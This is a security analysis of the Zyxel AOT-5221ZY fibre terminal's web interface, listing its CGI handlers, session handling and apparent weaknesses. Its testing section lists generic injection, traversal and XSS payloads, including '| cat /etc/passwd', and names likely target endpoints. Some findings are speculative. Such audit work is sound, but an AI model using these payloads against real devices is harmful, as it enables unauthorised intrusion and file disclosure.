Device: Zyxel AOT-5221ZY GPON ONT/ONU
Analysis Date: 2025-10-06
Web Root: /usr/shared/web/
- Executive Summary
- Web Server Architecture
- Web Interface Structure
- Page Organization
- CGI Backend Handlers (Complete List)
- Frontend Technologies
- Authentication & Session Management
- Security Analysis
- Frontend-Backend Validation Analysis
- API Endpoints
- Data Flow
- Vulnerabilities & Security Gaps
- Configuration Files
The Zyxel AOT-5221ZY web interface is a CGI-based system using:
- Web Server: mini_httpd (custom fork, version 1.30)
- Frontend: jQuery-based UI with JSON-driven dynamic pages
- Backend: 211 compiled C CGI binaries
- Data Model: TR-069/USP (InternetGatewayDevice) OID structure
- Session Management: Cookie-based with SessionKey validation
- Default Configuration: Movistar/Telefonica branding, Portuguese/English language
Total Web Components Found:
- 211 CGI binaries
- 38+ JSON tab definition files
- 50+ JavaScript files
- Hundreds of HTML fragments embedded in CGI binaries
Binary: /usr/bin/mini_httpd (78 KB)
Configuration Files (runtime):
/etc/mini_httpd1.conf- Primary HTTP server/etc/mini_httpd2.conf- Secondary HTTP server (remote management)/etc/mini_httpd3.conf- Additional instance/etc/mini_httpd4.conf- Additional instance
PID Files:
/tmp/mini_httpd1.pid/tmp/mini_httpd2.pid/tmp/mini_httpd3.pid/tmp/mini_httpd4.pid
Log Files:
/tmp/mini_httpd%d.log
SSL Certificate:
/etc/mycert/web.pem(3,146 bytes)- Symlinked as
/usr/shared/web/httpsCert.pem
Supported Methods:
- GET
- POST
Content Types:
text/html; charset=ISO-8859-1text/html; charset=%s(configurable)text/plain; charset=%sapplication/logapplication/certificationconfig/conf
CGI Support:
- CGI/1.1 interface
- Environment variables:
GATEWAY_INTERFACE,SERVER_PROTOCOL,PATH_INFO - Binary path:
/usr/local/bin:/usr/ucb:/bin:/usr/bin:/usr/sbin - Library path:
/lib:/usr/lib:/lib/MSTC:/usr/lib/MSTC
Special Paths:
/cgi-bin/- Main CGI directory/mhs/APIS/- Management API/mhs/jsps/- JSP-style pages/pages/- HTML page fragments/html/- Static resources
Temporary Files:
/tmp/.web_rcf- Web RCF (Runtime Configuration)/tmp/.webpipe- Web IPC pipe/tmp/TemporaryUseFile- Temporary upload storage/var/zerotouch.json- Zero-touch provisioning data
/usr/shared/web/
├── html/ # Frontend static files
│ ├── index.html # Entry point (redirects to indexmain.cgi)
│ ├── loginsum.html # Login summary page
│ ├── bgiframe.htm # Background iframe
│ ├── config.json # Application configuration
│ ├── css/ # Stylesheets
│ ├── js/ # JavaScript files (50+ files)
│ ├── images/ # Image assets
│ ├── style/ # Theme styles
│ │ └── Zyxel/ # Zyxel branding theme
│ └── pages/ # Page definitions
│ ├── network/
│ ├── security/
│ ├── maintenance/
│ ├── voip/
│ ├── systemMonitoring/
│ ├── tabFW/
│ └── VD/
├── cgi-bin/ # Backend CGI binaries (211 files)
│ ├── indexmain.cgi # Main dashboard
│ ├── login_advance.cgi # Login handler
│ ├── logout_advance.cgi # Logout handler
│ ├── menuJson.cgi # Menu structure provider
│ └── [208 more CGI binaries]
├── TabJson/ # Tab configuration storage
├── httpsCert.pem -> /etc/mycert/httpsCert.pem
├── romfile.cfg -> /var/config.cfg
├── romd.cfg -> /tmp/mrdcert
├── System.log -> /var/log/System.log
├── ExtractLog.tar.gz -> /tmp/ExtractLog.tar.gz
└── zerotouch.json -> /var/zerotouch.json
The web interface is organized into major functional categories:
Sub-sections:
-
Broadband - WAN connectivity, PPPoE, DHCP, 3G backup
- Handler:
broadband.cgi - JSON:
network/broadband/tab.json - Features: Connection management, 3G fallback support
- Handler:
-
Home Networking - LAN, DHCP server, IP configuration
- Handler:
lanSetup.cgi,ipv6LanSetup.cgi - JSON:
network/homeNetworking/tab.json,tab_QInQ.json,tab_no_USB.json - Features: IPv4/IPv6 dual-stack, QinQ VLAN support
- Handler:
-
Wireless - 2.4GHz WiFi settings
- Handlers:
wlan_general.cgi,wlan_MACAuthentication.cgi,wlan_wps.cgi - JSON:
network/wireless/tab.json,tab_no_Scheduling.json - Features: WPS, MAC filtering, guest networks
- Handlers:
-
Wireless 5G - 5GHz WiFi settings
- Handlers:
wlan5_general.cgi,wlan5_MACAuthentication.cgi,wlan5_wps.cgi - JSON:
network/wireless5G/tab.json
- Handlers:
-
Wireless EasyMesh - WiFi mesh networking
- Handler:
EasyMesh.cgi - JSON:
network/wirelessEasyMesh/tab.json - Features: IEEE 1905.1 Multi-AP coordination
- Handler:
-
Wireless Scheduling - Time-based WiFi control
- Handlers:
wlan_scheduling.cgi,wlan_schedule_add.cgi - JSON:
network/wirelessScheduling/tab.json
- Handlers:
-
QoS - Quality of Service
- Handlers:
qos_general.cgi,qos_class.cgi,qos_queue.cgi,qos_shaper.cgi - JSON:
network/qos/tab.json - Features: Traffic prioritization, bandwidth shaping
- Handlers:
-
NAT - Network Address Translation
- Handlers:
NAT_General.cgi,NAT_AddrMapping.cgi,portForwarding.cgi,dmz.cgi - JSON:
network/nat/tab.json - Features: Port forwarding, port triggering, DMZ, address mapping
- Handlers:
-
Routing - Static routes, DNS routing
- Handlers:
static.cgi,dns_routing.cgi - JSON:
network/routing/tab.json - Features: IPv4/IPv6 static routes, policy routing
- Handlers:
-
Port Binding - VLAN/port association
- Handler:
portbinding.cgi(inferred) - JSON:
network/portbinding/tab.json
- Handler:
-
Tunnel - GRE tunnels, IP tunnels
- Handlers:
gretunnel.cgi,ipTunnel.cgi - JSON:
network/tunnel/tab.json,tab_gre_tunnel.json
- Handlers:
-
VPN Server - VPN service configuration
- Handler: VPN-related CGIs (inferred)
- JSON:
network/VPNServer/tab.json
Sub-sections:
-
Firewall - Firewall rules and policies
- Handlers: Multiple TELFirewall_.cgi and TR181Firewall_.cgi
- JSON:
security/firewall/tab.json,security/TEF181firewall/tab.json,security/TR181firewall/tab.json - Features: Stateful packet inspection, DoS protection
- Note: Multiple firewall implementations (legacy TEL, TR-181 compliant)
-
Filter - MAC/IP filtering
- Handlers:
IP_MAC_Filter.cgi,ipMacFilterList.cgi - JSON:
security/filter/tab.json
- Handlers:
-
URL Filter - Web content filtering
- Handlers:
URL_Filter.cgi,URL_Filter_Edit.cgi,Keyword_Filter_list.cgi - JSON:
security/urlfilter/tab.json - Features: Keyword blocking, domain filtering
- Handlers:
-
Parental Control - Time-based access control
- Handlers:
ParentalControl.cgi,ParentalControladd.cgi - JSON:
security/parentalcontrol/tab.json
- Handlers:
-
Certificates - SSL/TLS certificate management
- Handlers:
localCA.cgi,trustedCA.cgi,sshCA_list.cgi - JSON:
security/certificates/tab.json - Features: Local CA, trusted CA, SSH key management
- Handlers:
Sub-sections:
-
SIP - SIP service provider settings
- Handlers:
sipServiceProvider.cgi,sipServiceProvider_setting.cgi,SIP_ALG.cgi - JSON:
voip/sip/tab.json
- Handlers:
-
Phone - VoIP phone configuration
- Handler:
phone.cgi - JSON:
voip/phone/tab.json - Features: FXS port configuration, codec settings
- Handler:
-
Call Rules - Call routing and rules
- Handlers:
callRule.cgi,callRule_CO.cgi - JSON:
voip/callrule/tab.json,tab_Unify_CO.json
- Handlers:
-
Call History - Call logs and records
- Handler: Call history CGI (inferred)
- JSON:
voip/callhistory/tab.json
Sub-sections:
-
Traffic Status - Network traffic statistics
- Handlers:
traffic_wan.cgi,traffic_lan.cgi,traffic_nat.cgi - JSON:
systemMonitoring/trafficStatus/tab.json
- Handlers:
-
Log - System log viewer
- Handlers:
viewlog.cgi,ViewSyslog.cgi - JSON:
systemMonitoring/log/tab.json
- Handlers:
-
VoIP Status - VoIP connection status
- Handlers:
VoIPStatus.cgi,VoIPStatus_list.cgi - JSON:
systemMonitoring/VoIPStatus/tab.json
- Handlers:
Sub-sections:
-
Remote Management - Remote access configuration
- Handlers:
RemMagGeneral.cgi- General remote managementRemMagWWW.cgi- Web interface accessRemMagWWW4Airtel.cgi- Airtel-specific web accessRemMagSNMP.cgi- SNMP configurationRemMagDNS.cgi- DNS configurationRemMagICMP.cgi- ICMP (ping) configurationRemMagSSH.cgi- SSH accessRemMagTELNET.cgi- Telnet access
- JSON:
maintenance/remotemgmt/tab.json,tab4Airtel.json,noSSH.json - Features: Multi-protocol remote access control
- Handlers:
-
Device Configuration - Backup/restore, factory reset
- Handlers:
backupRestore.cgi,reboot.cgi - JSON:
maintenance/deviceConfiguration/tab.json
- Handlers:
-
Diagnostic - Network diagnostics
- Handlers:
DiagGeneral.cgi,ping.cgi,mirror.cgi - JSON:
maintenance/disagnostic/tab.json - Features: Ping, traceroute, port mirroring
- Handlers:
-
Log Settings - Logging configuration
- Handler:
logSet.cgi - JSON:
maintenance/logSetting/tab.json
- Handler:
-
tabFW - Framework/template pages
- Handler:
tabFW.cgi - JSON:
tabFW/tab.json
- Handler:
-
VD (Vendor Customization) - Vendor-specific branding
- Handlers:
vd.cgi,vdview.cgi - Variants: P-660HNU-F1 specific customization
- Handlers:
Login/Authentication:
login_advance.cgi- Main login handlerlogout_advance.cgi- Logout handlerpassLogout.cgi- Password logoutdoregister.cgi- Registration handlerclear_first_access.asp- First access flag clear
Main Interface:
indexmain.cgi- Main dashboard/homepagemenuJson.cgi- Dynamic menu generationnaviView_partialLoad.cgi- Navigation partial loadinginfo.cgi- System informationcurrent.cgi- Current statusstatusview.cgi- Status viewnetworkMap.cgi- Network topology map
Network - Broadband/WAN:
broadband.cgi- WAN configurationconnection_icon_list.cgi- Connection status iconsconnection_table_list.cgi- Connection tableconnectionStatus_p1.cgi- Connection status page 1wanRemoteNode_ETH_Edit.cgi- Ethernet WAN editwanRemoteNode_GPON_Edit.cgi- GPON WAN edit
Network - LAN:
lanSetup.cgi- LAN configuration (IPv4)ipv6LanSetup.cgi- LAN configuration (IPv6)dhcp_static_list.cgi- DHCP static leases liststaticDHCP_add.cgi- Add DHCP static leasestaticDHCP.cgi- DHCP static configuration
Network - Wireless 2.4GHz:
wlan_general.cgi- General WiFi settingswlan_MACAuthentication.cgi- MAC authenticationwlan_macfilter_add.cgi- Add MAC filterwlan_macfilter_edit.cgi- Edit MAC filterwlan_mac_address_list.cgi- MAC address listwlan_mac_address_list1.cgi- MAC list (radio 1)wlan_mac_address_list2.cgi- MAC list (radio 2)wlan_mac_address_list3.cgi- MAC list (radio 3)wlan_moreAP.cgi- Multi-AP/Guest networkwlan_moreap_edit.cgi- Edit multi-APwlan_others.cgi- Other wireless settingswlan_wps.cgi- WPS configurationwlan_wpsinfo.cgi- WPS informationwlan_WpsStatus.cgi- WPS statuswlan_WPStimerRunning.cgi- WPS timer statuswlan_staionInfo.cgi- Station informationwlan_staionInfo_list.cgi- Station listwlan_staionInfo_list1.cgi- Station list (radio 1)wlan_staionInfo_list2.cgi- Station list (radio 2)wlan_staionInfo_list3.cgi- Station list (radio 3)moreApStatus.cgi- Multi-AP status
Network - Wireless 5GHz:
wlan5_general.cgi- 5GHz general settingswlan5_MACAuthentication.cgi- 5GHz MAC authwlan5_macfilter_add.cgi- Add 5GHz MAC filterwlan5_macfilter_edit.cgi- Edit 5GHz MAC filterwlan5_mac_address_list.cgi- 5GHz MAC listwlan5_mac_address_list1.cgi- 5GHz MAC list (radio 1)wlan5_mac_address_list2.cgi- 5GHz MAC list (radio 2)wlan5_mac_address_list3.cgi- 5GHz MAC list (radio 3)wlan5_moreAP.cgi- 5GHz multi-APwlan5_moreap_edit.cgi- Edit 5GHz multi-APwlan5_others.cgi- Other 5GHz settingswlan5_wps.cgi- 5GHz WPSwlan5_wpsinfo.cgi- 5GHz WPS infowlan5_WpsStatus.cgi- 5GHz WPS statuswlan5_WPStimerRunning.cgi- 5GHz WPS timerwlan5_staionInfo.cgi- 5GHz station infowlan5_staionInfo_list.cgi- 5GHz station listwlan5_staionInfo_list1.cgi- 5GHz station list (radio 1)wlan5_staionInfo_list2.cgi- 5GHz station list (radio 2)wlan5_staionInfo_list3.cgi- 5GHz station list (radio 3)
Network - Wireless Scheduling:
wlan_scheduling.cgi- WiFi schedulewlan_schedule_add.cgi- Add schedulewlan_schedule_edit.cgi- Edit schedulewlan_schedule_delete.cgi- Delete scheduleschedule_list.cgi- Schedule list
Network - EasyMesh:
EasyMesh.cgi- EasyMesh configuration
Network - QoS:
qos_general.cgi- QoS general settingsqos_class.cgi- QoS classificationqos_queue.cgi- QoS queue managementqos_shaper.cgi- Traffic shapingqos_class_add.cgi- Add QoS classqueue_add.cgi- Add queueshaper_add.cgi- Add shaper
Network - NAT:
NAT_General.cgi- NAT general settingsNAT_AddrMapping.cgi- Address mappingnat.cgi- NAT configurationportForwarding.cgi- Port forwardingportForwarding_add.cgi- Add port forwardportForwarding_edit.cgi- Edit port forwardport_forwarding_list.cgi- Port forward listport_forwarding_delete.cgi- Delete port forwardportTriggering.cgi- Port triggeringportTriggering_add.cgi- Add port triggerportTriggering_edit.cgi- Edit port triggerport_Triggering_list.cgi- Port trigger listdmz.cgi- DMZ host configurationaddrMap_add.cgi- Add address mapping
Network - Routing:
static.cgi- Static routesstatic_route_list.cgi- Static route liststatic_add.cgi- Add static routeipv6static.cgi- IPv6 static routesipv6static_add.cgi- Add IPv6 static routeipv6_static_route_list.cgi- IPv6 route listdns_routing.cgi- DNS routingdns_routing_add.cgi- Add DNS routedns_route_list.cgi- DNS route list
Network - Tunnel:
gretunnel.cgi- GRE tunnel configgretunnel_add.cgi- Add GRE tunnelgretunnel_list.cgi- GRE tunnel listipTunnel.cgi- IP tunnel config
Network - Other:
dynamicDNS_InadynV2.cgi- Dynamic DNS (Inadyn v2)dynamicDNS_InterfaceIndex.cgi- DDNS interfaceipalias.cgi- IP alias configurationupnp.cgi- UPnP configurationcurrent_upnp_table.cgi- Current UPnP mappings
Security - Firewall:
TELFirewall_general.cgi- TEF firewall generalTELFirewall_DoS.cgi- DoS protectionTELFirewall_DoS_Adv.cgi- Advanced DoSTELFirewall_FrwlEdit.cgi- Edit firewallTELFirewall_RuleEdit.cgi- Edit ruleTELFirewall_RuleSIndex.cgi- Rule indexTELFirewall_RuleSum.cgi- Rule summaryTELFirewall_RuleSum_frame.cgi- Rule summary frameTELFirewall_RuleTable.cgi- Rule tableTELFirewall_Table.cgi- Firewall tableTELFirewall_InterfaceIndex.cgi- Interface indexTELFirewall_IntfDirIndex.cgi- Interface directionTELFirewall_ServiceIndex.cgi- Service indexTR181Firewall.cgi- TR-181 firewallTR181Firewall_RuleEdit.cgi- TR-181 rule edit
Security - Filter:
IP_MAC_Filter.cgi- IP/MAC filteringipMacFilterList.cgi- IP/MAC filter listURL_Filter.cgi- URL filteringURL_Filter_Edit.cgi- Edit URL filterURL_Filter_list.cgi- URL filter listURL_Filter_delete.cgi- Delete URL filterKeyword_Filter_list.cgi- Keyword filter list
Security - Parental Control:
ParentalControl.cgi- Parental controlParentalControladd.cgi- Add parental controlParentalControl_view.cgi- View parental control
Security - Certificates:
localCA.cgi- Local CA managementlocalCA_frame.cgi- Local CA frametrustedCA.cgi- Trusted CA managementtrustedCA_add.cgi- Add trusted CAtrustedCA_view.cgi- View trusted CAsshCA_list.cgi- SSH CA list
VoIP - SIP:
sipServiceProvider.cgi- SIP provider configsipServiceProvider_setting.cgi- SIP provider settingssipServiceProvider_list.cgi- SIP provider listsipAccount.cgi- SIP account configsipAccount_setting.cgi- SIP account settingssipAccount_list.cgi- SIP account listSIP_ALG.cgi- SIP ALG configuration
VoIP - Phone:
phone.cgi- Phone configuration
VoIP - Call Rules:
callRule.cgi- Call rulescallRule_CO.cgi- Call rules (CO variant)
VoIP - Status:
VoIPStatus.cgi- VoIP statusVoIPStatus_list.cgi- VoIP status list
System Monitoring - Traffic:
traffic_wan.cgi- WAN traffictraffic_wan_frame1.cgi- WAN traffic frame 1traffic_wan_frame2.cgi- WAN traffic frame 2traffic_lan.cgi- LAN traffictraffic_lan_frame.cgi- LAN traffic frametraffic_nat.cgi- NAT traffic
System Monitoring - Logs:
viewlog.cgi- View logsViewSyslog.cgi- View syslog
Maintenance - Remote Management:
RemMagGeneral.cgi- General remote mgmtRemMagWWW.cgi- Web remote accessRemMagWWW4Airtel.cgi- Web access (Airtel)RemMagSNMP.cgi- SNMP configurationRemMagDNS.cgi- DNS configurationRemMagICMP.cgi- ICMP/Ping configurationRemMagSSH.cgi- SSH accessRemMagTELNET.cgi- Telnet access
Maintenance - Device Config:
backupRestore.cgi- Backup/restorereboot.cgi- Reboot devicerebootinfo.cgi- Reboot informationsystem.cgi- System configurationtime.cgi- Time/NTP configuration
Maintenance - Diagnostics:
DiagGeneral.cgi- General diagnosticsping.cgi- Ping toolmirror.cgi- Port mirroring
Maintenance - Logs:
logSet.cgi- Log settingszlog.cgi- Zlog configuration
Maintenance - Firmware:
firewareUpgrade.cgi- Firmware upgrade (typo in original)Fireware_UpgradesManaged.cgi- Managed firmware upgrade
TR-069/USP Management:
tr69cfg.cgi- TR-069 configurationtr369.cgi- TR-369/USP configurationagentMTP.cgi- USP agent MTPagentMTP_list.cgi- USP agent MTP listcontroller.cgi- USP controllercontroller_list.cgi- USP controller liststompConn.cgi- STOMP connectionstompConn_list.cgi- STOMP connection listmqttClient.cgi- MQTT clientmqttClient_list.cgi- MQTT client list
File Sharing:
fileSharing.cgi- File sharing configfileSharing_add.cgi- Add file sharefileSharing_mod.cgi- Modify file sharefileSharing_del.cgi- Delete file sharefileSharing_list.cgi- File share listfileSharing_browse.cgi- Browse file sharesfileuser_add.cgi- Add file userfileuser_mod.cgi- Modify file userfileuser_del.cgi- Delete file userfileuser_list.cgi- File user listprintServer.cgi- Print server config
User Management:
userAccount.cgi- User account management
PCP (Port Control Protocol):
PCP_ClientListIndex.cgi- PCP client listPCP_ClientListIndex_view.cgi- PCP client viewPCP_list.cgi- PCP listpcplist.cgi- PCP list (alternate)
GPON Specific:
gponPassword.cgi- GPON password config
Vendor/Custom:
vd.cgi- Vendor customizationvdview.cgi- Vendor viewtabFW.cgi- Tab framework
Utility/Framework:
delete.cgi- Generic delete handlerdelete_RuleSum.cgi- Delete rule summaryautofw_notify.asp- Auto-forward notificationautofw_notify_check.asp- Auto-forward check
Core Libraries:
- jQuery 1.3.2 (jquery-1.3.2.min.js)
- jQuery 1.6.3 (jquery-1.6.3.min.js)
- jQuery 3.6.0 (jquery-3.6.0.min.js)
⚠️ Multiple jQuery versions loaded - jQuery 3.6.3 (jquery-3.6.3.min.js)
- jQuery Migrate 1.4.1 (compatibility layer)
jQuery UI:
- jquery-ui-1.7.2.custom.min.js
- jquery-ui-dialog.min.js
- jquery-ui-slider.min.js
jQuery Plugins:
- jquery.tablesorter.min.js - Table sorting
- jquery.validate.pack.js - Form validation
- jquery.cookie.js - Cookie management
- jquery.tooltip.min.js - Tooltips
- jquery.simplemodal-1.3.min.js - Modal dialogs
- jquery.clickmenu.pack.js - Click menus
- jquery.bgiframe.pack.js - IE6 iframe fix
- jquery.pngFix.pack.js - PNG transparency fix
- jquery.layout.js - Page layout
- jquery.easing.1.3.js - Animation easing
- jquery.mousewheel.js - Mouse wheel support
- jquery.getParams.js - URL parameter parsing
- jquery.jgrowl.joze_mini.js - Notifications
- jquery.watermarkinput.js - Input placeholders
- jquery.text-overflow.js - Text truncation
- jquery.tools.min_tab.js - Tab interface
- jquery.zyCheckTree.js - Zyxel custom tree component
Custom Zyxel JavaScript:
- zyjs/ - Zyxel JavaScript library directory
- zyJqFunctions.js - Zyxel jQuery extensions
- zyMacUi.js - MAC address UI components
- zyMask.js - Input masking
- zyUiDialog.js - Custom dialogs
Application Logic:
- common.js - Common utilities
- functions.js - General functions
- General.js - General application logic
- javascript.js - Main application code
- jsonParser.js - JSON parsing
- jsl.js - JavaScript library extensions
- util.js - Utility functions
- security.js - Security functions
- wireless.js - Wireless-specific logic
- VD.js - Vendor customization logic
- portDef.js - Port definitions
- TimeZone.js - Timezone handling
- switch.js - Switch/toggle components
- ip_new.js - IP address handling
- loadingMask.js - Loading overlays
- userSwitchPanel.js - User switching
- Multi_Language.js - Internationalization
Framework Components:
- brickRichMenu.js - Menu component
- iframe.jquery.js - iframe utilities
- tools.scrollable-1.1.0.min.js - Scrolling
Location: /usr/shared/web/html/css/
Themes:
- Zyxel branding theme in
/style/Zyxel/ - Movistar branding (default per config.json)
Supported Languages:
- English (en) -
language.en.json - Portuguese (pt) -
language.pt.json(default)
Default Configuration:
- Language: Portuguese
- Branding: Movistar (Telefonica Spain/Latin America)
- Country: ES (Spain)
Entry Point:
- User accesses
/index.html - Redirects to
/cgi-bin/indexmain.cgi - If not authenticated, redirects to
/cgi-bin/login_advance.cgi - Login page displays login form
Login Handler: login_advance.cgi
Login Process:
User Input (username/password)
↓
POST to login_advance.cgi
↓
Backend validation (libwebutil.so)
↓
Check username/password against:
- /etc/config/rpcd (root user)
- Virtual user database
- PAM authentication
↓
If valid:
- Generate SessionKey
- Set HTTP cookie (session=SessionKey)
- Store session in /tmp/session_*
- Redirect to indexmain.cgi
↓
If invalid:
- Return to login page with error
Session Cookie:
- Name:
session - Value: SessionKey (random token)
- Path:
/ - Secure: HTTPS only (if configured)
Session Functions (libwebutil.so):
Session Creation:
cgiValidateAddSessionKey- Add new sessioncgiHeaderCookieSetString- Set cookie headercgiGetCurrSessionKey- Get current session key
Session Validation:
cgiSessionCheck- Validate session on each requestcgiValidateLocalSessionKey- Validate local sessionCookieGet- Get cookie valuegetSessionFilePathFromCookie- Resolve session file
Session Cleanup:
cgiSessionClean- Clean expired sessions
Session Storage:
- Session files likely in
/tmp/session_*or/var/run/ - Contains: SessionKey, CurrSessionTime, SessionIP
Session Timeout:
- Configured in
config.json:"SessionMaxTime": 600(10 minutes) - Warning before timeout:
"SessionWarning": false(disabled)
Session Security:
- IP address validation (
SessionIP) - Timestamp validation (
CurrSessionTime) - SessionKey randomness check
- Automatic lockout:
SessionLockedState,SessionLockedTime
Paths Checked:
/cgi-bin/login_advance.cgi- Login required/cgi-bin/logout_advance.cgi- Always accessible- Static resources (css, js, images) - Typically no auth required
- Error pages - No auth required
Potential Bypasses (to test):
- Direct CGI access without session cookie
- Session fixation attacks
- CSRF token absence
- Cookie tampering
From rpcd config (/etc/config/rpcd):
config login
option username 'root'
option password '$p$root'
list read '*'
list write '*'
Username: root
Password Hash: $p$root - This appears to be a placeholder/template
Actual Password:
- Not hardcoded in firmware
- Set during provisioning or first login
- May default to device-specific value (serial number, etc.)
Permissions:
- Full read access:
'*' - Full write access:
'*'
✅ Session-Based Authentication
- Cookie-based sessions with SessionKey
- IP address binding
- Timeout enforcement (10 minutes default)
- Session locking mechanism
✅ HTML Escaping
escape_html()function in libwebutilcgiHtmlEscape()for CGI outputescapeBackslash4JS()for JavaScript context
✅ HTTPS Support
- SSL certificate:
/etc/mycert/web.pem - mini_httpd supports HTTPS
✅ Access Control
- Per-user read/write permissions (rpcd)
- Login privilege management (OID: LoginPrivilegeMgmt)
✅ Input Validation
check_value()functioncheckUsedLanguage()for language validationcheckTimeOut()for session timeout
✅ Anti-Automation
- Session locking after failed attempts
- Timeout enforcement
❌ Weak Default Password Hash
- Password hash in rpcd config:
$p$root - Format suggests weak or placeholder hash
- Risk: Brute-force attack, rainbow tables
❌ Multiple jQuery Versions
- jQuery 1.3.2 (released 2009) - Known XSS vulnerabilities
- jQuery 1.6.3 (2011) - CVE-2011-4969 (XSS)
- jQuery 3.6.0/3.6.3 - Relatively current
- Risk: XSS exploitation via old jQuery
❌ No CSRF Protection Observed
- No CSRF token generation found
- No CSRF validation in CGI handlers
- Risk: Cross-site request forgery attacks
- Some CGI binaries may lack input validation
- Frontend validation != backend validation
- Need to audit: Each CGI for proper input sanitization
- Session files location not confirmed
- Might be predictable paths in
/tmp/ - Risk: Session hijacking if files world-readable
- If HTTPS not enforced, credentials sent in clear
- No evidence of forced HTTPS redirect
- Risk: Man-in-the-middle attacks
- HTML templates embedded in CGI binaries
- Difficult to audit for XSS
- Risk: Persistent XSS if templates have vulnerabilities
- 4 mini_httpd instances possible
- Different configurations may have different security
- Risk: Inconsistent security posture
- Firmware from 2024 but may use old libraries
- Need to check: OpenSSL/LibreSSL version in libcrypto
- Login endpoint may lack rate limiting
- Risk: Brute-force attacks
- Debug strings in binaries
- May leak sensitive information
- Risk: Information disclosure
isDebugVersionFWflag found- Debug-specific CGI paths
- Risk: Debug endpoints may bypass security
- RemMagTELNET.cgi suggests Telnet support
- Risk: Unencrypted remote access
Found in jQuery Validate plugin:
- Form field validation
- Input format checking
- Client-side sanitization
Limitations:
- ✗ Can be bypassed via browser DevTools
- ✗ Can be bypassed by direct HTTP requests
- ✗ Not security-relevant (convenience only)
Functions Found:
check_value()- Generic value checkingcgiHtmlEscape()- HTML entity encodingescape_html()- HTML escapingescapeBackslash4JS()- JavaScript escaping
OID Validation:
- All CGI access data via OID (InternetGatewayDevice.*)
- OID layer may provide validation
- Functions:
cccRdmGetObjectByOID(),cccRdmGetObjListByOID()
Methodology: To identify frontend/backend validation gaps, the following tests should be performed:
-
Bypass Frontend Validation:
- Capture legitimate request in browser
- Modify POST data to invalid values
- Submit directly via curl/Burp
- Check if backend accepts invalid data
-
Parameter Tampering:
- Add extra parameters
- Remove required parameters
- Change parameter types (string→number, etc.)
-
Boundary Testing:
- Oversized inputs (buffer overflow)
- Special characters injection
- Null bytes, Unicode edge cases
Based on naming and common patterns:
High Priority for Testing:
-
File Upload Handlers:
firewareUpgrade.cgi(firmware upload)backupRestore.cgi(config upload)⚠️ Risk: Path traversal, malicious file upload
-
Command Injection Candidates:
ping.cgi- May execute system ping commandDiagGeneral.cgi- May execute diagnostic commands⚠️ Risk: Command injection via unsanitized input
-
SQL Injection Candidates (if DB used):
- Any CGI with
_listsuffix (queries) - Filter/search functions
⚠️ Risk: SQL injection (if using SQL database)
- Any CGI with
-
Path Traversal:
fileSharing_browse.cgi- File browsingviewlog.cgi- Log file access⚠️ Risk: Directory traversal to access sensitive files
-
XSS Candidates:
- Any CGI that echoes user input
menuJson.cgi- Dynamic content generationnaviView_partialLoad.cgi- Partial page loads⚠️ Risk: Reflected/Stored XSS
For Each CGI:
- Intercept legitimate request
- Test with:
- SQL injection payloads:
' OR '1'='1,'; DROP TABLE-- - Command injection:
; ls,| cat /etc/passwd,`whoami` - Path traversal:
../../../etc/passwd,..\\..\\windows\\system32 - XSS payloads:
<script>alert(1)</script>,<img src=x onerror=alert(1)> - Buffer overflow: Very long strings (10KB+)
- Format strings:
%s%s%s%n - Null bytes:
file.txt\0.jpg
- SQL injection payloads:
- Check response for:
- Execution indicators (error messages, timing)
- Reflected input (XSS)
- File disclosure
- Server errors (500 = possible vulnerability)
Menu Structure API:
- Endpoint:
/cgi-bin/menuJson.cgi - Purpose: Dynamic menu generation based on user permissions and features
- Format: JSON response
Tab Configuration API:
- Endpoints: Each page has corresponding
/html/pages/*/tab.json - Purpose: Define page structure and CGI mappings
- Format: Static JSON files
Example Tab JSON Structure:
{
"tabTitle": "MLG_Menu_SubTitle_RemoteMGMT",
"pageIndex": "maintenance-remotemgmt",
"MLG_Tab_subTitle_General": {
"url": "../../../cgi-bin/RemMagGeneral.cgi"
},
"MLG_Tab_subTitle_WWW": {
"url": "../../../cgi-bin/RemMagWWW.cgi"
}
}MHS API Path:
/mhs/APIS/- Management Host System API/mhs/jsps/- JSP-style management pages
Purpose: Likely for ISP/OLT remote management
Zero-Touch Provisioning:
- File:
/var/zerotouch.json - Purpose: Auto-configuration data from network
- Accessible via:
/zerotouch.jsonsymlink in web root
TR-069 CGI:
tr69cfg.cgi- TR-069 configuration via web UItr69cfg.html- TR-069 status page
TR-369/USP CGI:
tr369.cgi- USP configurationagentMTP.cgi- Message Transfer Protocol configcontroller.cgi- USP controller managementstompConn.cgi- STOMP protocol connectionsmqttClient.cgi- MQTT connections
Data Model:
- Based on InternetGatewayDevice OID structure
- USP Device.LocalAgent.* objects
- Backend handles OID queries via libbemodules.so
User Browser
↓
HTTPS Request to mini_httpd (port 443/8080)
↓
mini_httpd validates session cookie
↓
If session valid:
- Parse request (GET/POST)
- Extract CGI path
- Set environment variables
- Execute CGI binary (/usr/shared/web/cgi-bin/X.cgi)
↓
CGI Binary Execution:
- Link libwebutil.so (session, HTML escaping)
- Link libbemodules.so (backend OID access)
- Parse POST/GET parameters
- Call cgiSessionCheck()
- Process business logic
- Call OID functions (cccRdmGetObjectByOID, etc.)
- Generate HTML output (embedded in binary)
- Call escape_html() on user input
- Output to stdout
↓
mini_httpd receives stdout
↓
Add HTTP headers (Content-Type, Set-Cookie, etc.)
↓
Send response to browser
Web UI Change
↓
CGI validates input
↓
Update OID via libbemodules.so
↓
OID change triggers backend action (be_*)
↓
Backend module (libbemodules.so):
- Validate change
- Update RDM (Runtime Data Model)
- Write to /var/config.cfg
- Trigger system command (e.g., restart service)
- Send ubus notification
↓
Service reconfigures (dhcp, firewall, wifi, etc.)
↓
Configuration persisted to flash (/var/config.cfg)
Object Identifier (OID) Structure:
- Format:
InternetGatewayDevice.Category.SubCategory.{i}.Parameter - Example:
InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.SSID
OID Access Functions:
cccRdmGetObjectByOID(oid)- Get single objectcccRdmGetObjListByOID(oid)- Get object listcccRdmSetObjectByOID(oid, value)- Set object value
OID Modules (in libbemodules.so):
- Each OID has:
OID_*_Boot- Initialization at bootOID_*_ConfigLoaderFunc- Configuration loaderOID_*_ConfigLoaderFunc_Boot- Boot-time config load
Example OIDs Found:
OID_InternetGatewayDevice_X_5067F0_Ext_LoginPrivilegeMgmt_i_ConfigLoaderFuncOID_InternetGatewayDevice_ManagementServer_X_5067F0_CAContent_ConfigLoaderFunc_BootOID_InternetGatewayDevice_Mos_MosUserConfig_ConfigLoaderFunc
| Vulnerability | Severity | CVSS | Exploitability | Impact |
|---|---|---|---|---|
| Old jQuery versions with known XSS | CRITICAL | 8.5 | Easy | Account takeover, session theft |
